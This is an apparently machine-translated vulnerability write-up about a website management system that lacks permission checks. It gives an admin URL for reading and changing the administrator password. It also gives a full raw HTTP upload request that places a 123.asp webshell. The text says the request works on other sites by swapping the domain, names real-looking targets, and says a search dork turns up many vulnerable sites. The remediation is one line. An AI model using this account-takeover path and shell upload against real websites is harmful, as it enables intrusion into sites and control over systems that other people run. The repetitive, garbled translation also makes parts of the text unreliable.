If a website management system has missing permissions, you can directly use getshell to obtain/change the management password.

If a website management system has missing permissions, you can directly use getshell to obtain/change the management password.

A website management system has missing permissions. You can use or change the management password to directly use getshell.

Google Search "technical support: thanks to the network" has a lot of results, and I went to the official website to see it. There are indeed many cases.


These problems are caused by a lack of background permissions, or why should I put permission verification at the end of the code ??


First, view and modify the administrator password:

Disable js and directly access:/admin/system/sys_usersEdit.asp? Id = 1
 

 

Then directly upload the shell:

Construct Data Packets: you only need to modify the domain name for different websites.

POST /include/upload.asp HTTP/1.1Host: 0512wld.comProxy-Connection: keep-aliveContent-Length: 8338Origin: http://szhylaw.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36Content-Type: multipart/form-data; boundary=----------GI3ae0cH2ae0gL6ae0Ij5KM7ei4Ij5Accept: */*Referer: http://0512wld.com/Admin/slider/sliderAdd.aspAccept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: ------------GI3ae0cH2ae0gL6ae0Ij5KM7ei4Ij5Content-Disposition: form-data; name="Filename"123.jpg------------GI3ae0cH2ae0gL6ae0Ij5KM7ei4Ij5Content-Disposition: form-data; name="Filedata"; filename="123.asp"Content-Type: application/octet-stream123123213------------GI3ae0cH2ae0gL6ae0Ij5KM7ei4Ij5Content-Disposition: form-data; name="Upload"Submit Query------------GI3ae0cH2ae0gL6ae0Ij5KM7ei4Ij5--

Direct submission:

You only need to modify the domain name for different websites.


 

 

 

Solution:

Enhanced verification